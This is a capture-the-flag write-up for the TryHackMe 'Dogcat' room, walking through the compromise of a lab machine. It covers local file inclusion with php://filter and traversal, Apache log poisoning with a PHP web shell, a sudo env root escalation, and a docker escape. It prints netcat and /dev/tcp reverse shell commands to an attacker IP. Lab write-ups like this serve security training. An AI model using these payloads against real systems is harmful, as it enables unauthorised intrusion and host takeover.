---
# System prepended metadata

title: 'THM - Challenge : Dogcat'

---

## THM - Challenge : Dogcat

## 1. Reconnaissance

### Service Enumeration

An initial nmap scan was conducted to identify the active attack surface on the target host. The scan revealed two open ports running standard network services:
![image](https://hackmd.io/_uploads/rJBPEyVxGl.png)

![image](https://hackmd.io/_uploads/HkvzLJVlze.png)

### Endpoint Analysis & Debugging

Navigating to the web application on port 80 exposes a gallery application that allows users to view random images of dogs or cats by clicking the respective interface buttons.

The user interaction triggers a dynamic resource request managed via the `view` URL parameter: `/?view=dog` or `/?view=cat`. This pattern indicates that the backend dynamically includes local filesystem components based on user input, establishing a strong hypothesis for a Local File Inclusion (LFI) vulnerability.
![image](https://hackmd.io/_uploads/rkaKSJ4lfl.png)

## 2. Vulnerability Analysis

### Input Sanitization Defeat

Submitting arbitrary strings or standard directory traversal payloads returns an application-level error message: "`Sorry, only dogs or cats are allowed."` This response confirms that the backend utilizes a strict string verification mechanism (such as `strpos()`) enforcing the presence of the keywords `dog` or `cat` within the parameter value.

To audit the backend code without executing it, the PHP resource filter wrapper (`php://filter`) was leveraged to extract the base64-encoded source code of the main controller:
```
/?view=php://filter/convert.base64-encode/resource=dog
```
![image](https://hackmd.io/_uploads/Hk5kU14eGe.png)

![image](https://hackmd.io/_uploads/SkQ_Uy4lfx.png)

![image](https://hackmd.io/_uploads/HkpTIy4gzg.png)

```
/?view=php://filter/convert.base64-encode/resource=dog/../flag
```
![image](https://hackmd.io/_uploads/HySVP1EgGx.png)

The application successfully processed the payload because the input contained the mandatory `dog` keyword. Decoding the retrieved base64 string exposed the core application logic in `index.php`:
![image](https://hackmd.io/_uploads/S1TWsJ4eGg.png)
- Insufficient Validation: The `containsStr` function merely validates substring existence rather than performing strict positional validation or whitelist matching. This allows an attacker to fulfill the condition by appending directory traversal sequences directly after the keyword (e.g., `dog/../../`).
- Extension Manipulation: The application appends a default `.php` file extension stored in the `$ext` variable. However, a parameter pollution vulnerability exists because the code allows direct override of this variable via the `$_GET["ext"]` array. Supplying an empty `&ext=` query parameter effectively nullifies the extension appending logic, allowing arbitrary file types to be processed by the `include` statement.

## 3. Initial Foothold

### LFI + Log Poisoning Exploitation

Server environment analysis indicated that `allow_url_include` was configured to `0` (Off), preventing Remote File Inclusion (RFI). Consequently, an Apache Log Poisoning vector was chosen to achieve Remote Code Execution (RCE).

First, the accessibility of the Apache log file via the LFI vector was verified by executing a path traversal query with an empty `ext` parameter.
![image](https://hackmd.io/_uploads/S1GvbgNxfx.png)

The log file rendered successfully in the HTTP response. Next, malicious PHP code was injected into the log entries by modifying the User-Agent string of an incoming HTTP request using a standard proxy/interceptor tool: 
`<?php system($_GET['cmd']); ?>`
![image](https://hackmd.io/_uploads/ryis9mVlGx.png)

![image](https://hackmd.io/_uploads/S1vJNlVxMx.png)

The server parsed this malicious payload into access.log. Subsequent execution of the LFI payload with the cmd parameter allowed for arbitrary system command execution. A system search was performed to locate flag assets:
```
find / -name "*flag*.*" -type f 2>/dev/null
```
![image](https://hackmd.io/_uploads/HkpLmWExfe.png)

## 4. Privilege Escalation

Initial access via the log poisoning vector yielded execution context under the low-privileged `www-data` account. An evaluation of allowed system binaries with elevated privileges was performed using `sudo -l`. The output indicated that `www-data` was granted `NOPASSWD` access to execute `/usr/bin/env` as `root`.
![image](https://hackmd.io/_uploads/rySjQWElzl.png)

Exploiting this misconfiguration via GTFOBins documentation allowed for an immediate privilege escalation vector:
```
/usr/bin/env /bin/sh -p -c "whoami && id"
```
![image](https://hackmd.io/_uploads/H15lN-4gfe.png)

The application executed `/bin/sh` with the `-p` flag, preserving the effective root user ID (`uid=0`). For stability, a reverse shell connection was spawned by staging a pre-compiled standalone Netcat static binary on the target machine, piping execution back to the attacker's listening instance on port `1212`:
```
cmd=/usr/bin/env+/bin/sh+-p+-c+"./nc+192.168.140.112+1212+-e+'/bin/sh+-p'"
```
![image](https://hackmd.io/_uploads/ByaugMVxMx.png)
An interactive root shell was captured on the controller machine. Flag 3 was located and retrieved within the environment.

### Environment Enumeration

```
/usr/bin/env /bin/sh -p -c "ls -al /"
```
![image](https://hackmd.io/_uploads/H1SXv-Vgfx.png)
Although root access was achieved, checking the root directory (`ls -al /`) revealed the presence of a `.dockerenv` file. This confirms that the current execution layer is isolated within a Docker Container, requiring a container breakout strategy to compromise the underlying host machine.

### Exploitation & Escape

Automated shell scripts running within the filesystem were audited to identify synchronization points between the container and the host platform:

Bash
```
/usr/bin/env+/bin/sh+-p+-c+"find+/+-name+"*.sh"+-type+f+2>/dev/null"
```
![image](https://hackmd.io/_uploads/Hkjd3bNxGg.png)
![image](https://hackmd.io/_uploads/HJgXQGNlGx.png)
The investigation pointed to an anomaly located inside a mounted storage volume at `/opt/backups/backup.sh`.

Inspecting the script properties of `/opt/backups/backup.sh` revealed the following maintenance code:
```
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container
```
![image](https://hackmd.io/_uploads/ryS4QfVlfx.png)
- Path Discrepancy: While the script file is hosted inside the container filesystem, the internal paths executed (`/root/container/...`) do not exist within the container template. The file paths correspond to the directory structure of the host deployment.
- Cronjob Synchronization: This correlation implies that the host operating system executes this script natively via an automated task (`cron`) utilizing the host's root administrative privileges.
- Write Access: Because the container root account possesses write privileges over this mounted directory, modifying the script translates directly to modifying the execution instructions on the host machine.

#### Execution:
A native Bash reverse shell string was appended to the end of the `backup.sh` script to target port `1213` on the attack host:
```
echo "bash -i >& /dev/tcp/192.168.140.112/1213 0>&1" >> /opt/backups/backup.sh
```
![image](https://hackmd.io/_uploads/ByTrmfNlfx.png)

A netcat listener was established on the attack infrastructure (`nc -nlvp 1213`). Within a 60-second window, the host cron daemon invoked the compromised `backup.sh` asset.
![image](https://hackmd.io/_uploads/SyoLmzNgGg.png)

A high-privilege reverse shell connection was successfully captured, granting administrative access directly onto the physical host system, achieving a complete container breakout.

## 5. Flag Retrieval